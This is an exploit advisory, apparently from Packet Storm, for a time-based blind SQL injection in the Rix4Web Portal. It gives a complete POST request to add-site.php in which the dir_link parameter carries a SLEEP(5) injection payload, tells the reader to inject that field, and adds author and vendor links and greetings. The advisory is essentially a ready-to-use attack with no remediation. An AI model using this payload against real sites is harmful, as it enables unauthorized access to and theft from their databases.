### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows
################################################

# AND time-based blind In POST:

POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.

# Just inject : dir_link

################################################
# Greetz To My Friendz

Source: Rix4Web Portal Remote Blind SQL Injection - Packet Storm